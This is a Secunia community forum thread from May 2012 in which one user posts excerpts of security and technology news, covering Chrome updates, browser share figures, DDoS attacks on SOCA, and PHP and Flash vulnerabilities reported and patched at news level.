Secunia CSI7
Advisories
Research
Forums
Create Profile
Our Commitment
PSI
PSI API
CSI
OSI
xSI
Vulnerabilities
Programs
Open Discussions
My Threads
Create Thread
Statistics
About

Forum Thread: Daily CYBERCLIPS May

You are currently viewing a forum thread in the Secunia Community Forum. Please note that opinions expressed here are not of Secunia but solely reflect those of the user who wrote it.

This thread was submitted in the following forum:
Open Discussions

This thread has been marked as locked.
mogs Daily CYBERCLIPS May
Expert Contributor 1st May, 2012 21:20
Ranking: 2265
Posts: 6,266
User Since: 22nd Apr, 2009
System Score: 100%
Location: UK

Twentieth Edition.

Thankyou for the support . Hope you find something of value/interest in the new thread. The new INDEX thread will follow shortly.
Please refrain from scoring on both threads.
Security is the mainstay of the thread with some related and varied topics.
Scroll down for the latest posts !!
Note; that no entry/post should be taken as a personal recommendation, unless otherwise stated.
Please continue to keep CYBERCLIPS free of junk and unattractive to any contentious individuals..
* Keep patching : up to date : be Cybersafe ! *

--

mogs CClip 1
Expert Contributor 1st May, 2012 21:22
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Stable Channel Update
Monday, April 30, 2012 | 13:38
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.168 on Windows, Mac, Linux and Chrome Frame.


Security fixes and rewards:

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.

[106413] High CVE-2011-3078: Use after free in floats handling. Credit to Google Chrome Security Team (Marty Barbella) and independent later discovery by miaubiz.
[117110] High CVE-2012-1521: Use after free in xml parser. Credit to Google Chrome Security Team (SkyLined) and independent later discovery by wushi of team509 reported through iDefense VCP (V-874rcfpq7z).
[117627] Medium CVE-2011-3079: IPC validation failure. Credit to PinkiePie.
[121726] Medium CVE-2011-3080: Race condition in sandbox IPC. Credit to Willem Pinckaers of Matasano.
[$1000] [121899] High CVE-2011-3081: Use after free in floats handling. Credit to miaubiz.

The bugs [106413], [117110] and [121899] were detected using AddressSanitizer.


Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 2
Expert Contributor 1st May, 2012 21:43
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
IE on a rebound, browser share data shows
Microsoft's IE gains usage share for third month in the first four of 2012

By Gregg Keizer
May 1, 2012 03:21 PM ET
Computerworld - Microsoft's Internet Explorer (IE) in April again gained usage share, the third time in the year's first four months, to stay well above the 50% mark and remain the world's top browser, a Web analytics company said today.

Google's Chrome's share also climbed in April, said Net Applications, ending that browser's three-month decline.

IE boosted its share by about three-tenths of a percentage point last month to average 54.1% in April. That returns IE to a mark comparable to its September 2011 share.

Since Jan.1, IE has increased its usage share by 2.2 percentage points for a 4% gain since the end of 2011. The turnaround has been IE's largest and longest since the browser began shedding share years ago to Firefox, then later, Chrome.

Microsoft has pinned its hopes almost entirely on IE9, the 2011 edition that runs only on Windows Vista and Windows 7.

Read more at :-
http://www.computerworld.com/s/article/9226753/IE_...

--
Was this reply relevant?
+0
-0
mogs CClip 3
Expert Contributor 1st May, 2012 21:47
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Symantec: More Malware on Religious Sites Than Porn Sites

Pornographic Web sites are less likely to be infected than religious, automotive or health sites, according to the company.

By Jeff Goldman

According to Symantec's annual Internet Security Threat Report, religious and ideological Web sites have far more security threats per infected site than adult/pornographic Web sites.

"We hypothesize that this is because pornographic Web site owners already make money from the Internet and, as a result, have a vested interested in keeping their sites malware-free -- it's not good for repeat business," the report states.

"Pornography-themed Web sites have long had a reputation as the 'dark alleyways' of the Internet," writes Threatpost's Paul Roberts. "In fact, porn sites ranked tenth in the list of the top ten categories of Web sites that are most infected, after automotive themed sites (ranked 8th) and health and medicine sites (ranked 9th). Top on that list: blogs and Web communications, including religious Web sites. That was followed by personally hosted sites, business sites, shopping and education."

"The average number of threats found on religious sites was 115 (mostly fake antivirus software)," writes The Wall Street Journal's Ben Rooney. "By contrast, pornographic sites had less than a quarter, at around 25 threats per site. Of course, the number of pornographic sites is vastly greater than religious sites."

"Symantec measured an increase of more than 81 percent in malware in 2011 over 2010, while the number of malware variants increased by 41 percent," writes PCWorld's Daniel Ionescu. "On the flip side, spam volumes have decreased from 88.5 percent of all email in 2010 to 75.1 percent in 2011 -- thanks to law enforcement action which shut down the Rustock worldwide botnet that was responsible for sending out large amounts of spam."

http://www.esecurityplanet.com/malware/symantec-mo...

--
Was this reply relevant?
+0
-0
mogs CClip 4
Expert Contributor 1st May, 2012 21:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Skype investigates tool that reveals users' IP addresses
Skype said the privacy-compromising issue is present in other peer-to-peer systems

By Jeremy Kirk | IDG News Service

Skype said Tuesday it is investigating a new tool that collects a person's last known IP address, a potential privacy-compromising issue.

Instructions posted on Pastebin on Thursday showed how a person's IP address could be shown without adding the targeted user as a contact by looking at the person's general information and log files.

Skype, which is owned by Microsoft, said in an email statement that "this is an ongoing, industry-wide issue faced by all peer-to-peer software companies. We are committed to the safety and security of our customers and we are taking measures to help protect them."

Read more at :-
http://www.infoworld.com/d/security/skype-investig...

--
Was this reply relevant?
+0
-0
mogs CClip 5
Expert Contributor 1st May, 2012 21:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft's Windows XP is still the most popular

It's hard to get users to migrate to Windows 7
By Lee Bell
Tue May 01 2012, 17:35
SOFTWARE HOUSE Microsoft's decade old operating system (OS) Windows XP is still the most popular, according to data released today by web analytics firm Net Applications.
Despite shedding users over the past year, Windows XP is still clinging onto a sizeable share of the market, with Net Applications' report showing only a minor drop in users to 46.08 per cent in April from 46.86 per cent in March.
Interestingly, the data also reflect an unusual rise-and-fall pattern in Windows XP's audience each month since last November.
Meanwhile, the study tells us that Windows 7 is continuing to grow in popularity with its most recent edition capturing a 38.67 per cent share of the market in April, up from 37.54 per cent in March.
Despite Windows XP's firm grip, Microsoft has been encouraging users and businesses to switch to Windows' most recent version, with relative success.
However, Microsoft will have to step up the message as a post on the Windows Team Blog announced last month that support for Windows XP will end in two years, causing panic among large enterprises that have to migrate thousands or tens of thousands of users, something that doesn't happen overnight.

Read more at :-
http://www.theinquirer.net/inquirer/news/2171792/m...

--
Was this reply relevant?
+0
-0
mogs CClip 6
Expert Contributor 1st May, 2012 22:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
“Search Engine Security” to Protect IE Users Against BlackHat SEO Links Security solutions provider Zscaler revealed its latest product designed to aid Internet users while surfing the web. It’s called Search Engine Security (SES) and it’s meant to protect Internet Explorer customers against BlackHat SEO links in search engines.

SES already exists for Mozilla Firefox and Google Chrome, but now the company also made the Internet Explorer variant available.

The way SES works is simple. Normally, when cybercriminals hijack a website and alter it to serve their purposes, they use Referer and User-Agent headers to decide if the user should be directed to the malicious webpage or a harmless one.

If it’s installed in the web browser, SES ensures that each time the user accesses a link from Google, Yahoo! or Bing, the headers are modified so that the hijacked site sees him as not being human, avoiding to redirect him to the malware-infested site.

Internauts who install SES will see a small piece of text at the top of the search engine result page which indicates if the feature is active or not.

The tool also allows customers to whitelist specific pages if they’re certain that they can’t cause any harm.

The control panel of the Internet Explorer version can be found in the Tools menu, under Search Engine Security options.

In the options menu, the user can activate the security feature for each search engine individually, he can set the Referer header, and add sites to the whitelist.

Internet users are advised to give SES a try, especially if they’re in the habit of using search engines on a regular basis.

Search Engine Security for Internet Explorer, Chrome and Firefox is available for download here.

http://news.softpedia.com/news/Search-Engine-Secur...

--
Was this reply relevant?
+0
-0
mogs CClip 7
Expert Contributor 2nd May, 2012 21:26
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Tuesday, May 1, 2012 | 23:14
Labels: Dev updates
The Dev channel has been updated to 20.0.1123.1 for Windows, Mac, and Chrome Frame. Linux will be updated tomorrow. This build contains following updates:

Updated V8 - 3.10.6.0
Fixed about:inducebrowsercrashforrealz (Issue: 124843)
[Windows] Visual refinements to the tab strip and toolbar icons, including a slightly wider new tab button (the “baby tab”) that is easier to click.
[Known Issues] Mouse over on apps/extensions makes place holder blank in web store. (Issue: 125777)

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 8
Expert Contributor 2nd May, 2012 21:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Mozilla ponders major Firefox UI refresh
Same look and feel on all editions, including tablet, phone and Windows 8 Metro, may show later this year

By Gregg Keizer
May 2, 2012 12:47 PM ET
Mozilla is working on a revamp of Firefox to synchronize its various versions -- desktop, tablet, phone and Windows 8 Metro -- into a single visual style, according to documents posted by members of its user interface (UI) design team.

The project, which does not have a name, and the earlier blending of Mozilla's mobile and desktop design groups, is meant to bring more coherence to the various versions of the open-source browser.

"One of our major goals for the year [is] getting Firefox to feel more like one product -- more 'Firefoxy' -- across all our platforms, desktop to tablet to phone," Madhava Enro of the Mozilla UI design team, said in a post to his personal blog yesterday.

Enro posted a slideshow he and others used the week before to present their proposals at a company get-together. According to the presentation, some UI elements will be shared across all Firefox editions, among them a lean toward "softer texture" and smoother curves in the design.

Read more at :-
http://www.computerworld.com/s/article/9226787/Moz...

--
Was this reply relevant?
+0
-0
mogs CClip 9
Expert Contributor 2nd May, 2012 21:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
China Tops the List for Attack Traffic

Akamai's State of the Internet report identifies China as the top source of global attack traffic for the fourth quarter of 2011.

By Sean Michael Kerner

Every quarter for the last four years, content delivery network provider Akamai has issued a State of the Internet report that identifies the top sources of attack traffic, among other key metrics.

For the fourth quarter of 2011, China topped Akamai's list of the top originating countries for attack traffic. China was responsible for 13 percent of total attack traffic overall, an increase from 8.6 percent in the previous quarter. China takes over from Indonesia, which previously held the top spot at 14 percent, but fell to 7.6 percent in the fourth quarter.

Sandwiched between China and Indonesia in the rankings is the U.S., which was the source of 10 percent of all originating attack traffic in the quarter, up from 7.3 percent the previous quarter.

"China has held the top spot before, including in the first issue of the report in Q1 2008," said Akamai report author David Belson in an interview with eSecurity Planet. "I don't think that this portends a significant trend -– as we’ve seen over the past four years, the top country changes very frequently, and I expect that it will continue to do so in the future."

In 2011, the "top attack traffic source" title changed hands a number of times. In addition to China and Indonesia, Myanmar (first quarter) and Taiwan (second quarter) also held the top spots during the year. And at the end of 2010, Russia was reported to be in the top spot, accounting for 10 percent of all observed global attack traffic.

More at :-
http://www.esecurityplanet.com/hackers/china-tops-...

--
Was this reply relevant?
+0
-0
mogs CClip 10
Expert Contributor 2nd May, 2012 21:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Scrambls puts control of social media back in the hands of users
Service allows users to keep their Facebook posts away from prying eyes -- including Google itself -- and lets corporations redact sensitive posts

By Robert Lemos | InfoWorldFollow @infoworld

Facebook, Twitter, and other social media sites may not be happy if a new service that launched in beta Wednesday takes off.

The service, scrambls, may be misspelled and lack a proper capital letter, but it aims to put the control of social-media posts back in the hands of users. Using scrambls, which is an add-on to major browsers, users can encrypt submissions to Facebook, Twitter, and other social networks, giving them fine-grained control over the scrambled text.

The service suggests interesting possibilities: Consumers could make their posts unreadable to anyone but themselves after three or six months, restrict access to certain posts to only family members, or block the social media site from using the posts for marketing purposes. Companies could create internal feeds unreadable by competitors and have an undo button to redact posts that leak sensitive information.

More at :-
http://www.infoworld.com/t/data-security/scrambls-...

--
Was this reply relevant?
+0
-0
mogs CClip 11
Expert Contributor 2nd May, 2012 21:50
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Check Point relaunches ZoneAlarm antivirus as free product
Adds firewall and cloud protection
By John E Dunn | Techworld | 02 May 12

Check Point is offering its ZoneAlarm antivirus software as a free consumer product for the first time, adding the company's no-cost firewall to the bundle to offer all-in-one PC protection.

The thinking behind ZoneAlarm Free Antivirus + Firewall 2013 appears to be to pack more under the 'free' banner than its rivals, which stick pretty much to file scanning with a layer of realtime threat detection.

The combined product gets identity theft protection (first added to the paid software in 2008), an anti-phishing toolbar of the sort sometimes found at the browser layer, and free online backup for those who want an alternative to Google's Drive or Microsoft's SkyDrive.

It also comes with a download protection layer that monitors for known 'bad' files and what Check Point calls an "OS firewall", a way of monitoring for craftier threats that have somehow bypassed Windows itself.

However, the most interesting addition is the integration of the antivirus client with Check Point's free firewall, which uses Check Point's DefenseNet cloud system to analyse a PC's files against known bad examples.

An obvious question is what customers of the company's paid software - Internet Security Suite 2012 - will get over and above the free client and the answer seems to be extras such as parental controls, credit monitoring and the company's virtual browser technology.

More at :-
http://www.pcadvisor.co.uk/news/security/3355337/c...

--
Was this reply relevant?
+0
-0
mogs CClip 12
Expert Contributor 3rd May, 2012 03:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Wednesday, May 2, 2012 | 18:00
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.41 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 13
Expert Contributor 3rd May, 2012 12:14
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

IE 'silent' upgrade helps put newest browser on Windows
Stats show some Windows 7 and Vista users upgraded to IE9, but the new practice affected few XP users

By Gregg Keizer
May 2, 2012 04:05 PM ET
Computerworld - Microsoft's decision late last year to switch on "silent" upgrades for Internet Explorer (IE) has moved some Windows users to newer versions, but has had little, if any, impact on the oldest editions, IE6 and IE7, according to usage statistics.

In December 2011, Microsoft announced it would start automatically upgrading IE so that users ran the newest version suitable for their copy of Windows.

Under the plan, Windows XP users still on IE6 or IE7 would be updated to IE8, while Windows Vista or Windows 7 users running IE7 or IE8 would be pushed to IE9.

Previously, Microsoft has always asked users for their permission before upgrading IE from one version to the next, even if Windows' automatic updates was enabled.

First to get the automatic treatment, Microsoft said, would be Australia and Brazil, both guinea pigs for the January 2012 debut. The program would then be gradually expanded to other markets.

Yesterday, Microsoft declined to disclose what other countries, if any, had had the auto-upgrade switched on.

But in Australia and Brazil, the move shuffled share among some editions of IE, according to data from StatCounter, an Irish Web analytics company that publishes country-by-country usage share numbers for IE6, IE7, IE8 and IE9.

Read more at :-
http://www.computerworld.com/s/article/9226799/IE_...

--
Was this reply relevant?
+0
-0
mogs CClip 14
Expert Contributor 3rd May, 2012 21:02
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

OpenX Promises Fix for Rogue Ads Bug

Hackers are actively exploiting a dangerous security vulnerability in OpenX — an online ad-serving solution for Web sites — to run booby-trapped ads that serve malware and browser exploits across countless Web sites that depend on the solution.

Security experts have been warning for months about mysterious attacks on OpenX installations in which the site owners discovered new rogue administrator accounts. That access allows miscreants to load tainted ads on sites that rely on the software. The bad ads usually try to foist malware on visitors, or frighten them into paying for bogus security software.

OpenX is only now just starting to acknowledge the attacks, as more users are coming forward with unanswered questions about the mysteriously added administrator accounts.

Continue reading at :-
http://krebsonsecurity.com/category/latest-warning...

--
Was this reply relevant?
+0
-0
mogs CClip 15
Expert Contributor 3rd May, 2012 21:10
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Botnet army flicks 'off' switch at UK crime agency website

Suspiciously close to Soca's shutdown of stolen-data shops
By Brid-Aine Parnell

Posted in Enterprise Security, 3rd May 2012 13:26 GMT
The UK's Serious Organised Crime Agency's website has been taken offline following a DDoS attack that started last night and is still going on.

SOCA decided to take the site down itself around 10pm last night to stop the distributed denial of service attack from bothering other connected websites.

"We took the site off temporarily to limit the impact of the DDoS on other clients who are hosted by the same service provider," a spokesperson told The Reg.

The botnet army has succeeded in getting the site offline, but not a whole lot else.

"Frankly, DDoS are a temporary inconvenience to website visitors but they're not a security risk to the organisation," the spokesperson said.

More at :-
http://www.theregister.co.uk/2012/05/03/soca_site_...

--
Was this reply relevant?
+0
-0
mogs CClip 16
Expert Contributor 3rd May, 2012 21:13
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google counters juice V8 Javascript engine

Beta channels primed
By Gavin Clarke

Posted in Developer, 3rd May 2012 14:59 GMT
Google’s V8 engine is getting more picky about the Javascript code it optimises to boost the performance of the search giant’s browser.

The current developer and beta channel releases of Chrome now come with a version of V8 that uses a new counters-based algorithm to decide which functions to optimise, Google has revealed.

Google claimed a 25 per cent increase in speed with Chrome 19, with the updated version of V8, compared to Chrome 18 on SunSpider performance tests.

V8 compiles Javascript in two stages: first to machine code and then optimising it, a fact that means V8 needs to predict what functions to optimise.

Traditionally V8 has stopped once every millisecond to look at the running functions and decide which should be optimised. As the Chromium blog put it: "A single millisecond can be a long time to wait before optimizing!“

The new V8 algorithm uses counters to keep track of how often Javascript fictions are called and loops executed in a program. The Chromium blog said: “That way V8 is able to quickly gather fine-grained information about performance bottlenecks in a JavaScript program, and to make sure that the optimizing compiler's efforts are spent on those functions that deserve it most.” ®
http://www.theregister.co.uk/2012/05/03/chromium_v...

--
Was this reply relevant?
+0
-0
mogs CClip 17
Expert Contributor 3rd May, 2012 21:25
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Government warns of increased cyber attack threat during Olympics The government has warned that the UK is likely to come under attack by cyber criminals during the London Olympics this summer.
In a speech in Estonia, Cabinet Office minister Francis Maude said UK government computers are regularly targeted by foreign intelligence agencies or groups working on their behalf.
He said the government's objective was to make the UK more resilient to such types of attacks.
"This year's Olympics in the United Kingdom will not be immune to cyber attacks by those who would seek to disrupt the Games," he said.
"The Beijing Olympics saw 12 million cyber security incidents during their Olympics. We have rightly been preparing for some time - a dedicated unit will help guard the London Olympics against cyber attack - we are determined to have a safe and secure Games."
Maude referred to the £650m of funding the government has put aside to tighten its security for cyber attacks during the next four years, and the transformative national cyber security programme it has established.

More at :-
http://www.v3.co.uk/v3-uk/news/2172259/government-...

--
Was this reply relevant?
+0
-0
mogs CClip 18
Expert Contributor 4th May, 2012 17:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft boots Chinese firm for leaking Windows exploit
Kicks Hangzhou DPTech out of MAPP after tracing proof-of-concept code leak

By Gregg Keizer
May 4, 2012 06:39 AM ET
Computerworld - Microsoft on Thursday identified a Chinese security partner as the source of a leak last March in its highly restricted vulnerability information-sharing program.

The company, Hangzhou DPTech Technologies, was tossed out of the Microsoft Active Protection Program (MAPP) for leaking the proof-of-concept exploit.

"During our investigation into the disclosure of confidential data shared with our Microsoft Active Protections Program (MAPP) partners, we determined that a member ... Hangzhou DPTech Technologies Co., Ltd., had breached our non-disclosure agreement (NDA)," Yunsun Wee, director of Microsoft's Trustworthy Computing group, wrote in a post to a company blog. "Microsoft takes breaches of our NDAs very seriously and has removed this partner from the MAPP Program."

More at :-
http://www.computerworld.com/s/article/9226877/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 19
Expert Contributor 4th May, 2012 17:18
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Bloggers plead for Windows Live Writer's life
Microsoft says the tool 'works great' on Windows 8, but dodges questions on demise after Live brand is retired

By Gregg Keizer
May 3, 2012 05:08 PM
Computerworld - A Windows developer, upset at the likely demise of Windows Live Writer as part of Microsoft's move to retire the Live brand, has launched an online petition drive to save the tool.

On Wednesday, Microsoft announced it was retiring the Windows Live brand, and will replace it with a set of online consumer services targeting Windows 8, the operating system upgrade expected to launch later this year.

In a grid Microsoft published yesterday, Windows Live Writer was noticeably absent, leading users to conclude that the company was killing the blog publishing program.

More at :-
http://www.computerworld.com/s/article/9226850/Blo...

--
Was this reply relevant?
+0
-0
mogs CClip 20
Expert Contributor 4th May, 2012 17:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Microsoft plans big May patch slate for next week
Schedules seven updates to patch 23 bugs in Windows, Office

By Gregg Keizer
May 3, 2012 03:00 PM
Computerworld - Microsoft today said it would ship seven security updates next week, three critical, to patch 23 bugs in Windows, Office and its Silverlight and .Net development platforms.

The number of patches -- nearly two dozen -- is higher than usual for an odd-numbered month; for some time, Microsoft has used an even-odd schedule, patching more vulnerabilities in the even months, when it also regularly updates Internet Explorer.

"May has been a light month, historically, very light," said Andrew Storms, director of security operations at nCircle Security, who tracks the number of patches and updates Microsoft issues each month.

In May 2011, Microsoft shipped two update that patched three vulnerabilities. The year before, it delivered two updates that patched two bugs.

"So, this is a big number," said Storms.

The pace so far this year -- Microsoft's collections during the first five months have included seven, nine, six, six and seven updates -- puts to rest the idea that Microsoft still hews to a wave-and-trough practice.

More at :-
http://www.computerworld.com/s/article/9226846/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 21
Expert Contributor 4th May, 2012 17:27
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oracle urges removal of older Java versions due to security risks
Company points users to latest Java update, with most recent features, fixes, and performance improvements

By Paul Krill | InfoWorldFollow @pjkrill

Oracle, in making Java Platform, Standard Edition (SE) 7 the default runtime environment for Java this week, is emphasizing that older versions of Java be removed for security purposes.

The company recommends updating to the latest version of Java, which contains the most recent features, fixes, and performance improvements. Along with that, older versions should be removed. "Keeping old and unsupported versions of Java on your system presents a serious security risk," Oracle said on Java.com. "Removing older versions of Java from your system ensures that Java applications will run with the most up-to-date security and performance improvements on your system."

[ Also on InfoWorld: Last week, Oracle released Java SE 7 Update 4 and JavaFX 2.1, including a Java Development Kit and JavaFX Software Development Kit for Mac OS X. | For more on Java, subscribe to InfoWorld's Enterprise Java newsletter. ]

Oracle offers instructions for removing older versions. Java, however, has been under fire lately in the security realm, with a Java-borne Trojan, called Flashback, affecting Apple Macs.

More at :-
http://www.infoworld.com/d/application-development...

--
Was this reply relevant?
+0
-0
mogs CClip 22
Expert Contributor 4th May, 2012 17:30
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Critical PHP vulnerability exposes servers to data theft -- or worse
PHP Group releases updates to fix vulnerability that allows a remote attacker to easily pass command-line switches to servers through URLs

By Ted Samson | InfoWorldFollow @tsamson_IW


A newly reported critical vulnerability in PHP enables would-be cyber criminals to steal source code or inject and run malware in PHP applications by adding command-line parameters to URLs. Fortunately, The PHP Group has announced updates to PHP that its says eliminates the vulnerability.

The vulnerability specifically affects the way PHP-CGI-based setups parse query string parameters from PHP files. FastCGI for PHP installations are not affected. The vulnerability can only be exploited if the HTTP server follows a fairly obscure part of the CGI spec, according to Eindbazen, the group of researchers that initially found the bug

More at :-
http://www.infoworld.com/t/application-security/cr...

--
Was this reply relevant?
+0
-0
mogs CClip 23
Expert Contributor 4th May, 2012 17:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
SOCA website still down after mystery cyber attack
Cause unknown, DDoS suspected

By John E Dunn | Computerworld UK | 04 May 12
The website of the UK's Serious Organised Crime Agency (SOCA) has been downed by what is starting to look like the most serious cyberattack ever to hit the site.

Reported as having been offline since Wednesday night (2 May), by Thursday morning the site had still not returned as expected, an unusually long blackout for such a high-profile website.

The site has been hit before, notably by alleged LulzSec hacker Ryan Cleary in June 2011, and will have found itself under some form of attack more or less every day since.

What has caused the latest downing is unknown. A DDoS attack is the most likely culprit but these do not usually take hours to deflect. A more serious incursion is starting to look at least possible; the outage is now even longer than that allegedly caused by Cleary.

More at :-
http://www.pcadvisor.co.uk/news/security/3355753/s...

--
Was this reply relevant?
+0
-0
mogs CClip 24
Expert Contributor 4th May, 2012 17:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
John McAfee, antivirus pioneer, arrested by Belize police
Detained by anti-gang police who shot dog, reports say

By John E Dunn | Techworld | 04 May 12
McAfee antivirus founder John McAfee is reportedly taking legal advice after a raid on his Belize home by police resulted in the software entrepreneur's arrest and the death of his pet dog.

The raid in the early morning of 1 May by the country's armed 'Gang Suppression Unit' (GSU) allegedly involved the doors to McAfee's house being smashed down, his property ransacked, and his dog shot.

After searching the house for drugs and firearms and handcuffing him and his 12 employees, the police detained McAfee for a number of hours before releasing him at 2am the following morning.

The police haven't given a reason for the raid but did reportedly find a cache of weapons including 12 gauge shotguns, handguns, rifles with scopes and ammunition. McAfee said he'd presented permits for all but one of the weapons which were for his company's security.

More at :-
http://www.pcadvisor.co.uk/news/security/3355796/j...

--
Was this reply relevant?
+0
-0
mogs CClip 25
Expert Contributor 4th May, 2012 18:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Ministry of Defence security chief admits organisation hit by cyber attacks The Ministry of Defence's (MoD) security chief has warned that the UK needs to take urgent measures to combat the growing threat of cyber attacks, revealing the organisation has itself recently been breached.
Major general Jonathan Shaw made the claim during an interview with The Guardian, reporting there is an increasing number of attacks now targeting the UK.
"The number of serious incidents is quite small, but it is there. The likelihood is there are problems in there [MoD networks] we don't know about," he said.
Shaw suggested that the MoD will have to seek aid from young people to effectively combat criminals and hostile nation's cyber attacks.
"My generation, we are far too old for this; it is not what we have grown up with. Our natural recourse is to reach for a pen and paper. And although we can set up structures, we really need to be on listening mode for this one," he said.

More at :-
http://www.v3.co.uk/v3-uk/news/2172735/ministry-de...

--
Was this reply relevant?
+0
-0
mogs CClip 26
Expert Contributor 5th May, 2012 05:57
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Download Google Chrome 20.0.1123.4 Dev, Chrome 21 Around the Corner There's a good two weeks until Google Chrome 20 is set to graduate to the beta channel, but it seems Google has already started preparing Chrome 20.0.1123.* for this.

The latest update to the dev channel, Chrome 20.0.1123.4, is a bug-fixing release and that's what all the future ones will be until Chrome 21 enters the dev channel.

There's a fix for the Pepper version of the Flash Player for Linux. Chrome is getting ready to make the switch to the PPAPI Flash Player replacing the old NPAPI one. A rendering bug, which left the process running even after navigating away, has now been fixed.

Chrome 21 should be landing as part of the Chromium daily builds and the Canary channel soon, if 1123 is the branch Google chooses to move up to the beta channel and then to the stable release.

http://news.softpedia.com/news/Download-Google-Chr...

--
Was this reply relevant?
+0
-0
mogs CClip 27
Expert Contributor 5th May, 2012 06:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
IP Address Not Enough to Accuse Users of Piracy, Judge Rules

In a recent copyright infringement case filed by an adult film studio, the judge has made a ruling that will probably affect many lawsuits in which several defendants are accused of illegally downloading content. Judge Gary Brown has ruled that a simple IP address can’t be associated with a single person.

The recent mass lawsuits against individuals who were suspected of committing copyright infringement were basically the same. The rights holder would record the IP addresses of those who downloaded their property, after which he would try to obtain a court order to force ISPs to reveal the identities that were hiding behind it.

Of course, with the increase in popularity of Wi-Fi routers, the IP the person was associated with in many cases didn’t match the actual culprit.

Recent studies have shown that many Wi-Fi routers are not secured, and even if they are, there are always tricks that can be utilized to connect to them. Not to mention the fact that in a household several people may be using the same Internet connection, including visitors.

According to TorrentFreak, New York Magistrate Judge Gary Brown is well aware of these factors so he made a few recommendations, even advising other judges to dismiss future cases that are based solely on IP addresses.

More at :-
http://news.softpedia.com/news/IP-Address-Not-Enou...

--
Was this reply relevant?
+0
-0
mogs CClip 28
Expert Contributor 5th May, 2012 06:10
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Adobe patches new Flash zero-day bug with emergency update
In-the-wild attacks target Windows' Internet Explorer, says company

By Gregg Keizer
May 4, 2012 02:19 PM
Computerworld - Adobe today warned that hackers are exploiting a critical vulnerability in its popular Flash Player program, and issued an emergency update to patch the bug.

"There are reports that the vulnerability is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious file delivered in an email message," the Friday advisory said.

Although all editions of Flash Player contain the vulnerability and should be patched, the active exploit is targeting only users of Microsoft's Internet Explorer (IE).

Flash Player for IE is an ActiveX plug-in, the Microsoft-only standard; other browsers, including Firefox and Chrome, use a different plug-in structure.

The update was pegged with Adobe's priority rating of "1," used to label patches for actively-exploited vulnerabilities or bugs that will likely be exploited. For such updates, Adobe recommends that customers install the new version within 72 hours.

Adobe disclosed relatively few details about the vulnerability -- its usual practice -- other than to label it an "object confusion vulnerability," note the Common Vulnerabilities & Exposures ID of CVE-2012-0779, and acknowledge that triggering the bug "could cause the application to crash and potentially allow an attacker to take control of the affected system."

It's unclear how extensive the active attacks are, although Adobe's calling them "targeted" hints at a low volume of attempts aimed at specific individuals or companies.

Today's Flash Player update was the fourth this year -- the latest before Friday was on March 28 -- putting the frequently-patched program on about the same pace as last year, when Adobe issued a total of nine Flash security updates.

In March, Adobe addressed the frequent updating pain point -- at least for Windows users -- by shipping Flash Player 11.2, which uses a silent, background update mechanism. The silent update is supposed to kick in in some situations to automatically patch the plug-in in IE, Firefox, Safari and Opera on Windows without notifying or bothering users.

At the time, Adobe said it would switch on silent updates " on a case-by-case basis," but hinted that the service would primarily be used to distribute patches for zero-day vulnerabilities, such as today's.

